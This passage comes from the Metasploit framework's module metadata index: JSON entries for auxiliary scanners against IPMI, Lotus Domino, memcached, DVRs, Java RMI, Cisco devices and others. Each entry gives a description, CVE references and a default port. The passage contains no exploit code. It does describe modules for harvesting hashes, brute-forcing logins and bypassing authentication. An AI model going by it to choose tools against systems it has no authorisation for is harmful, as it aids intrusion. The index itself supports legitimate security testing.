"description": "A vulnerability in Internet Key Exchange version 1 (IKEv1) packet\n processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software\n could allow an unauthenticated, remote attacker to retrieve memory\n contents, which could lead to the disclosure of confidential information.\n\n The vulnerability is due to insufficient condition checks in the part\n of the code that handles IKEv1 security negotiation requests.\n An attacker could exploit this vulnerability by sending a crafted IKEv1\n packet to an affected device configured to accept IKEv1 security\n negotiation requests. A successful exploit could allow the attacker\n to retrieve memory contents, which could lead to the disclosure of\n confidential information.",
"references": [
"CVE-2016-6415",
"URL-https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110",
"URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1",
"URL-https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6415",
"URL-https://musalbas.com/2016/08/18/equation-group-benigncertain.html"
],
"platform": "",
"arch": "",
"rport": 500,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.rb",
"is_install_path": true,
"ref_name": "scanner/ike/cisco_ike_benigncertain",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/imap/imap_version": {
"name": "IMAP4 Banner Grabber",
"full_name": "auxiliary/scanner/imap/imap_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "IMAP4 Banner Grabber",
"references": [
],
"platform": "",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/imap/imap_version.rb",
"is_install_path": true,
"ref_name": "scanner/imap/imap_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ip/ipidseq": {
"name": "IPID Sequence Scanner",
"full_name": "auxiliary/scanner/ip/ipidseq",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "This module will probe hosts' IPID sequences and classify\n them using the same method Nmap uses when it's performing\n its IPID Idle Scan (-sI) and OS Detection (-O).\n\n Nmap's probes are SYN/ACKs while this module's are SYNs.\n While this does not change the underlying functionality,\n it does change the chance of whether or not the probe\n will be stopped by a firewall.\n\n Nmap's Idle Scan can use hosts whose IPID sequences are\n classified as \"Incremental\" or \"Broken little-endian incremental\".",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ip/ipidseq.rb",
"is_install_path": true,
"ref_name": "scanner/ip/ipidseq",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ipmi/ipmi_cipher_zero": {
"name": "IPMI 2.0 Cipher Zero Authentication Bypass Scanner",
"full_name": "auxiliary/scanner/ipmi/ipmi_cipher_zero",
"rank": 300,
"disclosure_date": "2013-06-20",
"type": "auxiliary",
"author": [
"Dan Farmer <zen@fish2.com>",
"hdm <x@hdm.io>"
],
"description": "This module identifies IPMI 2.0-compatible systems that are vulnerable\n to an authentication bypass vulnerability through the use of cipher\n zero.",
"references": [
"CVE-2013-4782",
"URL-http://fish2.com/ipmi/cipherzero.html",
"OSVDB-93038",
"OSVDB-93039",
"OSVDB-93040"
],
"platform": "",
"arch": "",
"rport": 623,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb",
"is_install_path": true,
"ref_name": "scanner/ipmi/ipmi_cipher_zero",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ipmi/ipmi_dumphashes": {
"name": "IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval",
"full_name": "auxiliary/scanner/ipmi/ipmi_dumphashes",
"rank": 300,
"disclosure_date": "2013-06-20",
"type": "auxiliary",
"author": [
"Dan Farmer <zen@fish2.com>",
"hdm <x@hdm.io>"
],
"description": "This module identifies IPMI 2.0-compatible systems and attempts to retrieve the\n HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a\n file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb\n in the tools subdirectory, as well as hashcat (cpu) 0.46 or newer using type 7300.",
"references": [
"URL-http://fish2.com/ipmi/remote-pw-cracking.html",
"URL-https://seclists.org/bugtraq/2014/Apr/16",
"CVE-2013-4786",
"OSVDB-95057",
"BID-61076"
],
"platform": "",
"arch": "",
"rport": 623,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb",
"is_install_path": true,
"ref_name": "scanner/ipmi/ipmi_dumphashes",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/ipmi/ipmi_version": {
"name": "IPMI Information Discovery",
"full_name": "auxiliary/scanner/ipmi/ipmi_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Dan Farmer <zen@fish2.com>",
"hdm <x@hdm.io>"
],
"description": "Discover host information through IPMI Channel Auth probes",
"references": [
"URL-http://fish2.com/ipmi/"
],
"platform": "",
"arch": "",
"rport": 623,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ipmi/ipmi_version.rb",
"is_install_path": true,
"ref_name": "scanner/ipmi/ipmi_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/jenkins/jenkins_udp_broadcast_enum": {
"name": "Jenkins Server Broadcast Enumeration",
"full_name": "auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Adam Compton <adam_compton@rapid7.com>",
"Matt Schmidt <matt_schmidt@rapid7.com>"
],
"description": "This module sends out a UDP broadcast packet querying for\n any Jenkins servers on the local network.\n Be advised that while this module does not identify the\n port on which Jenkins is running, the default port for\n Jenkins is 8080.",
"references": [
"URL-https://wiki.jenkins-ci.org/display/JENKINS/Auto-discovering+Jenkins+on+the+network"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 04:43:37 +0000",
"path": "/modules/auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum.rb",
"is_install_path": true,
"ref_name": "scanner/jenkins/jenkins_udp_broadcast_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/kademlia/server_info": {
"name": "Gather Kademlia Server Information",
"full_name": "auxiliary/scanner/kademlia/server_info",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module uses the Kademlia BOOTSTRAP and PING messages to identify\n and extract information from Kademlia speaking UDP endpoints,\n typically belonging to eMule/eDonkey/BitTorrent servers or other P2P\n applications.",
"references": [
"URL-http://gbmaster.wordpress.com/2013/06/16/botnets-surrounding-us-sending-kademlia2_bootstrap_req-kademlia2_hello_req-and-their-strict-cousins/#more-125"
],
"platform": "",
"arch": "",
"rport": 4672,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/kademlia/server_info.rb",
"is_install_path": true,
"ref_name": "scanner/kademlia/server_info",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/llmnr/query": {
"name": "LLMNR Query",
"full_name": "auxiliary/scanner/llmnr/query",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module sends LLMNR queries, which are really just normal UDP DNS\n queries done (usually) over multicast on a different port, 5355.\n Targets other than the default RHOSTS' 224.0.0.252 should not respond\n but may anyway.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5355,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/llmnr/query.rb",
"is_install_path": true,
"ref_name": "scanner/llmnr/query",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/lotus/lotus_domino_hashes": {
"name": "Lotus Domino Password Hash Collector",
"full_name": "auxiliary/scanner/lotus/lotus_domino_hashes",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tiago Ferreira <tiago.ccna@gmail.com>"
],
"description": "Get users' password hashes from the names.nsf page",
"references": [
"CVE-2007-0977"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-21 08:50:26 +0000",
"path": "/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb",
"is_install_path": true,
"ref_name": "scanner/lotus/lotus_domino_hashes",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/lotus/lotus_domino_login": {
"name": "Lotus Domino Brute Force Utility",
"full_name": "auxiliary/scanner/lotus/lotus_domino_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tiago Ferreira <tiago.ccna@gmail.com>"
],
"description": "Lotus Domino Authentication Brute Force Utility",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/lotus/lotus_domino_login.rb",
"is_install_path": true,
"ref_name": "scanner/lotus/lotus_domino_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/lotus/lotus_domino_version": {
"name": "Lotus Domino Version",
"full_name": "auxiliary/scanner/lotus/lotus_domino_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "Several checks to determine Lotus Domino Server Version.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/lotus/lotus_domino_version.rb",
"is_install_path": true,
"ref_name": "scanner/lotus/lotus_domino_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mdns/query": {
"name": "mDNS Query",
"full_name": "auxiliary/scanner/mdns/query",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module sends mDNS queries, which are really just normal UDP DNS\n queries done (usually) over multicast on a different port, 5353.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5353,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mdns/query.rb",
"is_install_path": true,
"ref_name": "scanner/mdns/query",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/memcached/memcached_amp": {
"name": "Memcached Stats Amplification Scanner",
"full_name": "auxiliary/scanner/memcached/memcached_amp",
"rank": 300,
"disclosure_date": "2018-02-27",
"type": "auxiliary",
"author": [
"Marek Majkowski",
"xistence <xistence@0x90.nl>",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module can be used to discover Memcached servers which expose the\n unrestricted UDP port 11211. A basic \"stats\" request is executed to check\n if an amplification attack is possible against a third party.",
"references": [
"URL-https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/",
"CVE-2018-1000115"
],
"platform": "",
"arch": "",
"rport": 11211,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-03-06 16:04:00 +0000",
"path": "/modules/auxiliary/scanner/memcached/memcached_amp.rb",
"is_install_path": true,
"ref_name": "scanner/memcached/memcached_amp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/memcached/memcached_udp_version": {
"name": "Memcached UDP Version Scanner",
"full_name": "auxiliary/scanner/memcached/memcached_udp_version",
"rank": 300,
"disclosure_date": "2003-07-23",
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module can be used to discover Memcached servers which expose the\n unrestricted UDP port 11211. A basic \"version\" request is executed to obtain\n the version of memcached.",
"references": [
"URL-https://github.com/memcached/memcached/blob/master/doc/protocol.txt"
],
"platform": "",
"arch": "",
"rport": 11211,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-03-06 18:16:22 +0000",
"path": "/modules/auxiliary/scanner/memcached/memcached_udp_version.rb",
"is_install_path": true,
"ref_name": "scanner/memcached/memcached_udp_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/cctv_dvr_login": {
"name": "CCTV DVR Login Scanning Utility",
"full_name": "auxiliary/scanner/misc/cctv_dvr_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Justin Cacak"
],
"description": "This module tests for standalone CCTV DVR video surveillance\n deployments specifically by MicroDigital, HIVISION, CTRing, and\n numerous other rebranded devices that are utilizing default vendor\n passwords. Additionally, this module has the ability to brute\n force user accounts.\n\n Such CCTV DVR video surveillance deployments support remote\n viewing through Central Management Software (CMS) via the\n CMS Web Client, an IE ActiveX control hosted over HTTP, or\n through Win32 or mobile CMS client software. By default,\n remote authentication is handled over port 5920/TCP with video\n streaming over 5921/TCP.\n\n After successful authentication over 5920/TCP this module\n will then attempt to determine if the IE ActiveX control\n is listening on the default HTTP port (80/TCP).",
"references": [
],
"platform": "",
"arch": "",
"rport": 5920,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/cctv_dvr_login.rb",
"is_install_path": true,
"ref_name": "scanner/misc/cctv_dvr_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/cisco_smart_install": {
"name": "Identify Cisco Smart Install endpoints",
"full_name": "auxiliary/scanner/misc/cisco_smart_install",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>",
"Mumbai"
],
"description": "This module attempts to connect to the specified Cisco Smart Install port\n and determines if it speaks the Smart Install Protocol. Exposure of SMI\n to untrusted networks can allow complete compromise of the switch.",
"references": [
"URL-https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html",
"URL-https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature",
"URL-https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi",
"URL-https://github.com/Cisco-Talos/smi_check",
"URL-https://github.com/Sab0tag3d/SIET"
],
"platform": "",
"arch": "",
"rport": 4786,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-21 21:33:29 +0000",
"path": "/modules/auxiliary/scanner/misc/cisco_smart_install.rb",
"is_install_path": true,
"ref_name": "scanner/misc/cisco_smart_install",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/clamav_control": {
"name": "ClamAV Remote Command Transmitter",
"full_name": "auxiliary/scanner/misc/clamav_control",
"rank": 300,
"disclosure_date": "2016-06-08",
"type": "auxiliary",
"author": [
"Alejandro Hdeza",
"bwatters-r7",
"wvu <wvu@metasploit.com>"
],
"description": "In certain configurations, ClamAV will bind to all addresses and listen for commands.\n This module sends properly-formatted commands to the ClamAV daemon if it is in such a\n configuration.",
"references": [
"URL-https://twitter.com/nitr0usmx/status/740673507684679680/photo/1",
"URL-https://github.com/vrtadmin/clamav-faq/raw/master/manual/clamdoc.pdf"
],
"platform": "",
"arch": "",
"rport": 3310,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/auxiliary/scanner/misc/clamav_control.rb",
"is_install_path": true,
"ref_name": "scanner/misc/clamav_control",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/dahua_dvr_auth_bypass": {
"name": "Dahua DVR Auth Bypass Scanner",
"full_name": "auxiliary/scanner/misc/dahua_dvr_auth_bypass",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tyler Bennett - Talos Consulting",
"Jake Reynolds - Depth Security",
"Jon Hart <jon_hart@rapid7.com>",
"Nathan McBride"
],
"description": "Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user's password and clears the device logs.",
"references": [
"CVE-2013-6117",
"URL-https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117"
],
"platform": "",
"arch": "",
"rport": 37777,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/misc/dahua_dvr_auth_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/dvr_config_disclosure": {
"name": "Multiple DVR Manufacturers Configuration Disclosure",
"full_name": "auxiliary/scanner/misc/dvr_config_disclosure",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Alejandro Ramos",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module takes advantage of an authentication bypass vulnerability in the\n web interface of multiple manufacturers' DVR systems, which allows the\n device configuration to be retrieved.",
"references": [
"CVE-2013-1391",
"URL-http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb",
"is_install_path": true,
"ref_name": "scanner/misc/dvr_config_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/easycafe_server_fileaccess": {
"name": "EasyCafe Server Remote File Access",
"full_name": "auxiliary/scanner/misc/easycafe_server_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"R-73eN",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a file retrieval vulnerability in\n EasyCafe Server. The vulnerability can be triggered by\n sending a specially crafted packet (opcode 0x43) to the\n 831/TCP port.\n This module has been successfully tested on EasyCafe Server\n version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3\n and Windows 7 SP1.\n Note that the server will throw a popup messagebox if the\n specified file does not exist.",
"references": [
"EDB-39102"
],
"platform": "",
"arch": "",
"rport": 831,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/misc/easycafe_server_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/ib_service_mgr_info": {
"name": "Borland InterBase Services Manager Information",
"full_name": "auxiliary/scanner/misc/ib_service_mgr_info",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module retrieves the version of the services manager, and the version\n and implementation of the InterBase server, from the InterBase\n Services Manager.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb",
"is_install_path": true,
"ref_name": "scanner/misc/ib_service_mgr_info",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/ibm_mq_channel_brute": {
"name": "IBM WebSphere MQ Channel Name Bruteforce",
"full_name": "auxiliary/scanner/misc/ibm_mq_channel_brute",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Petros Koutroumpis"
],
"description": "This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1414,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-20 16:24:17 +0000",
"path": "/modules/auxiliary/scanner/misc/ibm_mq_channel_brute.rb",
"is_install_path": true,
"ref_name": "scanner/misc/ibm_mq_channel_brute",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/ibm_mq_enum": {
"name": "Identify Queue Manager Name and MQ Version",
"full_name": "auxiliary/scanner/misc/ibm_mq_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Petros Koutroumpis"
],
"description": "Run this auxiliary against the listening port of an IBM MQ Queue Manager to identify its name and version. Any channel type can be used to get this information as long as the name of the channel is valid.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-21 16:09:18 +0000",
"path": "/modules/auxiliary/scanner/misc/ibm_mq_enum.rb",
"is_install_path": true,
"ref_name": "scanner/misc/ibm_mq_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/ibm_mq_login": {
"name": "IBM WebSphere MQ Login Check",
"full_name": "auxiliary/scanner/misc/ibm_mq_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Petros Koutroumpis"
],
"description": "This module can be used to bruteforce usernames that can be used to connect to a queue manager. The name of a valid server-connection channel without SSL configured is required, as well as a list of usernames to try.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1414,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-29 17:29:05 +0000",
"path": "/modules/auxiliary/scanner/misc/ibm_mq_login.rb",
"is_install_path": true,
"ref_name": "scanner/misc/ibm_mq_login",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/java_jmx_server": {
"name": "Java JMX Server Insecure Endpoint Code Execution Scanner",
"full_name": "auxiliary/scanner/misc/java_jmx_server",
"rank": 300,
"disclosure_date": "2013-05-22",
"type": "auxiliary",
"author": [
"rocktheboat"
],
"description": "Detect Java JMX endpoints",
"references": [
"URL-https://docs.oracle.com/javase/8/docs/technotes/guides/jmx/JMX_1_4_specification.pdf",
"URL-https://www.optiv.com/blog/exploiting-jmx-rmi",
"CVE-2015-2342"
],
"platform": "Java",
"arch": "",
"rport": 1099,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-19 12:56:53 +0000",
"path": "/modules/auxiliary/scanner/misc/java_jmx_server.rb",
"is_install_path": true,
"ref_name": "scanner/misc/java_jmx_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/java_rmi_server": {
"name": "Java RMI Server Insecure Endpoint Code Execution Scanner",
"full_name": "auxiliary/scanner/misc/java_rmi_server",
"rank": 300,
"disclosure_date": "2011-10-15",
"type": "auxiliary",
"author": [
"mihi",
"hdm <x@hdm.io>"
],
"description": "Detect Java RMI endpoints",
"references": [
"URL-http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html",
"URL-http://www.securitytracker.com/id?1026215",
"CVE-2011-3556"
],
"platform": "",
"arch": "",
"rport": 1099,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/java_rmi_server.rb",
"is_install_path": true,
"ref_name": "scanner/misc/java_rmi_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/oki_scanner": {
"name": "OKI Printer Default Login Credential Scanner",
"full_name": "auxiliary/scanner/misc/oki_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"antr6X <anthr6x@gmail.com>"
],
"description": "This module scans for OKI printers via SNMP, then tries to connect to found devices\n with vendor default administrator credentials via HTTP authentication. By default, OKI\n network printers use the last six digits of the MAC address as the admin password.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/oki_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/misc/oki_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/poisonivy_control_scanner": {
"name": "Poison Ivy Command and Control Scanner",
"full_name": "auxiliary/scanner/misc/poisonivy_control_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"SeawolfRN"
],
"description": "Enumerate Poison Ivy Command and Control (C&C) on ports 3460, 80, 8080 and 443. Adaptation of iTrust Python script.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/misc/poisonivy_control_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/raysharp_dvr_passwords": {
"name": "Ray Sharp DVR Password Retriever",
"full_name": "auxiliary/scanner/misc/raysharp_dvr_passwords",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"someluser",
"hdm <x@hdm.io>"
],
"description": "This module takes advantage of a protocol design issue with the\n Ray Sharp based DVR systems. It is possible to retrieve the username and\n password through the TCP service running on port 9000. Other brands using\n this platform and exposing the same issue may include Swann, Lorex,\n Night Owl, Zmodo, URMET, and KGuard Security.",
"references": [
"URL-http://console-cowboys.blogspot.com/2013/01/swann-song-dvr-insecurity.html"
],
"platform": "",
"arch": "",
"rport": 9000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb",
"is_install_path": true,
"ref_name": "scanner/misc/raysharp_dvr_passwords",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/rosewill_rxs3211_passwords": {
"name": "Rosewill RXS-3211 IP Camera Password Retriever",
"full_name": "auxiliary/scanner/misc/rosewill_rxs3211_passwords",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ben Schmidt"
],
"description": "This module takes advantage of a protocol design issue with the Rosewill admin\n executable in order to retrieve passwords, allowing remote attackers to take\n administrative control over the device. Other similar IP Cameras such as Edimax,\n Hawking, Zonet, etc., are also believed to have the same flaw, but this has not been fully tested.\n The protocol design issue also allows attackers to reset passwords on the device.",
"references": [
],
"platform": "",
"arch": "",
"rport": 13364,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb",
"is_install_path": true,
"ref_name": "scanner/misc/rosewill_rxs3211_passwords",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/sercomm_backdoor_scanner": {
"name": "SerComm Network Device Backdoor Detection",
"full_name": "auxiliary/scanner/misc/sercomm_backdoor_scanner",
"rank": 300,
"disclosure_date": "2013-12-31",
"type": "auxiliary",
"author": [
"Eloi Vanderbeken <eloi.vanderbeken@gmail.com>",
"Matt \"hostess\" Andreko <mandreko@accuvant.com>"
],
"description": "This module can identify SerComm manufactured network devices which\n contain a backdoor, allowing command injection or account disclosure.",
"references": [
"CVE-2014-0659",
"OSVDB-101653",
"URL-https://github.com/elvanderb/TCP-32764"
],
"platform": "",
"arch": "",
"rport": 32764,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/misc/sercomm_backdoor_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/sunrpc_portmapper": {
"name": "SunRPC Portmap Program Enumerator",
"full_name": "auxiliary/scanner/misc/sunrpc_portmapper",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"tebo <tebo@attackresearch.com>"
],
"description": "This module calls the target portmap service and enumerates all program\n entries and their running port numbers.",
"references": [
"URL-http://www.ietf.org/rfc/rfc1057.txt"
],
"platform": "",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
